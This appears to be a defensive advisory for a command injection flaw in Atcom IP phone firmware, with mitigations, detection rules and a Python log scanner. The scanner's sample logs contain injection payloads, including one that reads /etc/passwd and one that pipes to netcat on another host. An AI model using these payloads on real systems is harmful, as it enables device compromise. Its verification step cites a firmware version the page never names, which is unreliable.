CVE-2024-58314
📋 TL;DR
This CVE describes an authenticated command injection vulnerability in Atcom 100M IP Phone firmware. An attacker who holds administrative credentials for the web configuration interface can inject shell metacharacters through the 'cmd' parameter of /cgi-bin/web_cgi_main.cgi, and the firmware passes the value to a system shell, giving remote code execution on the phone. Organizations running affected Atcom IP phones whose web interface is reachable beyond a trusted management network are at risk.
💻 Affected Systems
- Atcom 100M IP Phones
⚠️ Manual Verification Required
This CVE does not have specific version information in our database, so automatic vulnerability detection cannot determine if your system is affected.
Why? The CVE database entry doesn't specify which versions are vulnerable (no version ranges provided by the vendor/NVD).
- Review the CVE details at NVD
- Check vendor security advisories for your specific version
- Test if the vulnerability is exploitable in your environment
- Consider updating to the latest version as a precaution
⚠️ Risk & Real-World Impact
Worst Case
Full compromise of the IP phone device, lateral movement to internal networks, data exfiltration, and persistent backdoor installation.
Likely Case
Unauthorized access to phone configuration, call interception, credential theft, and use as pivot point for internal network attacks.
If Mitigated
Exploitation still requires a valid administrative login, so the attack surface is reduced to insiders and anyone who has obtained or guessed the credentials (default or reused passwords remain the most likely path).
🎯 Exploit Status
Exploit requires authentication but is trivial to execute once credentials are obtained.
🛠️ Fix & Mitigation
✅ Official Fix
Patch Version: Unknown
Vendor Advisory: https://www.atcom.cn/html/yingwenban/Product/Fast_IP_phone/2017/1023/135.html
Restart Required: Yes
Instructions:
1. Check the vendor website for firmware updates.
2. Download the latest firmware from the vendor site only.
3. Upload the image via the web interface.
4. Reboot the device and confirm the new version is reported.
🔧 Temporary Workarounds
Disable Web Interface
Disable the web configuration interface if it is not required for operations.
Configuration varies by device; check the admin interface for a web service disable option. If the phone is provisioned centrally, the interface is usually not needed day to day.
Network Segmentation
Restrict access to IP phone management interfaces using firewall rules on the gateway or firewall in front of the phone subnet (the phone firmware itself does not expose iptables). Rule order matters: the ACCEPT must be appended before the DROP, and if the web interface is also served over HTTPS, repeat both rules for port 443. The subnet placeholders below are to be replaced with your own values.
# Allow web management of the phone subnet from the trusted admin network only
iptables -A FORWARD -p tcp -d <phone-subnet>/24 --dport 80 -s <trusted-network>/24 -j ACCEPT
# Drop web management traffic to the phones from everywhere else
iptables -A FORWARD -p tcp -d <phone-subnet>/24 --dport 80 -j DROP
🧯 If You Can't Patch
- Change default administrative credentials to strong, unique passwords
- Implement network segmentation to isolate IP phones from critical systems
🔍 How to Verify
Check if Vulnerable:
Read the firmware version from the web interface; on many Atcom devices it is shown on the status page (http://[phone-ip]/status.cgi or a similar endpoint on your model).
Check Version:
curl -s http://[phone-ip]/status.cgi | grep -i firmware
Verify Fix Applied:
Confirm the device no longer reports the 2.7.x.x firmware line named here (NVD lists no version range, so do not rely on the version string alone) and, from a trusted host, confirm that an authenticated request to /cgi-bin/web_cgi_main.cgi whose cmd value contains a harmless shell metacharacter sequence is rejected rather than executed.
📡 Detection & Monitoring
Log Indicators:
- Unusual web access patterns to /cgi-bin/web_cgi_main.cgi
- Commands with shell metacharacters in URL parameters
Network Indicators:
- HTTP POST requests to /cgi-bin/web_cgi_main.cgi with a cmd parameter containing shell metacharacters, either raw (; & | ` $ ( )) or URL-encoded (%3B %26 %7C %60 %24 %28 %29)
- Because the parameter travels in a POST body, standard web access logs will not record it; capture it from a reverse proxy, WAF or packet capture that logs request bodies, or from the phone's own web log if the firmware exposes one
SIEM Query (generic pseudo-syntax; field names depend on your log source):
source="web_logs" AND uri="/cgi-bin/web_cgi_main.cgi" AND param="cmd" AND value MATCHES "[;&|`$()]|%3[bB]|%26|%7[cC]|%60|%24|%2[89]"
Decode URL-encoded parameter values before matching where your SIEM supports it; the encoded alternatives above are a fallback for sources that store raw requests.
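The detection logic above, applied to web access log lines as an added worked example. This is not code from the original page or from the vendor; it assumes combined-log-format lines in which the query string is visible, and the sample lines, IP addresses and cmd values are constructed for illustration. It URL-decodes the cmd value (twice, to catch double encoding) and flags shell metacharacters only when the request targets /cgi-bin/web_cgi_main.cgi; the same check can be fed a captured POST body through the body argument.

```python
import re
import urllib.parse
from typing import Optional

# Constructed sample access-log lines (combined log format); not real Atcom data.
SAMPLE_LOGS = [
    '10.0.5.21 - admin [12/Mar/2025:10:01:02 +0000] "GET /cgi-bin/web_cgi_main.cgi?cmd=status HTTP/1.1" 200 512',
    '10.0.5.21 - admin [12/Mar/2025:10:01:09 +0000] "GET /cgi-bin/web_cgi_main.cgi?cmd=ping%3Bcat%20/etc/passwd HTTP/1.1" 200 2048',
    '10.0.5.37 - admin [12/Mar/2025:10:02:44 +0000] "POST /cgi-bin/web_cgi_main.cgi?cmd=reboot%7Cnc%2010.0.5.99%204444 HTTP/1.1" 200 0',
    '10.0.5.40 - - [12/Mar/2025:10:03:10 +0000] "GET /status.cgi HTTP/1.1" 200 300',
    '10.0.5.21 - admin [12/Mar/2025:10:03:30 +0000] "GET /cgi-bin/web_cgi_main.cgi?cmd=%60id%60 HTTP/1.1" 200 64',
]

TARGET_PATH = "/cgi-bin/web_cgi_main.cgi"

# Shell metacharacters that chain or substitute commands: ; & | ` $ ( )
META_RE = re.compile(r"[;&|`$()]")

# Minimal combined-log parser: source IP, user, timestamp, method, request target, status.
LOG_RE = re.compile(
    r'^(?P<src>\S+) \S+ (?P<user>\S+) \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)


def _suspicious_cmd_values(query: str) -> Optional[str]:
    """Return the first decoded cmd value containing shell metacharacters, else None."""
    params = urllib.parse.parse_qs(query, keep_blank_values=True)
    for value in params.get("cmd", []):
        # parse_qs decodes once; decode again so %253B (double-encoded ';') is caught too.
        decoded = urllib.parse.unquote(value)
        if META_RE.search(decoded):
            return decoded
    return None


def suspicious_request(target: str, body: str = "") -> Optional[str]:
    """Check a request target (path + query) and optional form body for the injection pattern.

    Returns the offending decoded cmd value when the request hits the vulnerable CGI
    and the cmd parameter carries shell metacharacters; None otherwise.
    """
    parsed = urllib.parse.urlsplit(target)
    if parsed.path != TARGET_PATH:
        return None
    hit = _suspicious_cmd_values(parsed.query)
    if hit is None and body:
        # POST bodies are not in standard access logs; callers supply them from a proxy/WAF log.
        hit = _suspicious_cmd_values(body)
    return hit


def scan(lines):
    """Parse log lines and return one dict per suspicious request."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # skip lines that are not in the expected format
        cmd = suspicious_request(m["target"])
        if cmd is not None:
            hits.append({"src": m["src"], "user": m["user"], "method": m["method"], "cmd": cmd})
    return hits


if __name__ == "__main__":
    for hit in scan(SAMPLE_LOGS):
        print(f'{hit["src"]} {hit["user"]} {hit["method"]} cmd={hit["cmd"]!r}')
```

On the constructed sample the scan returns three hits (the `;`, `|` and backtick payloads) and ignores the legitimate `cmd=status` request and the unrelated /status.cgi request. In production, feed it the proxy or WAF records that include POST bodies, since the access log alone will miss the POST case described above.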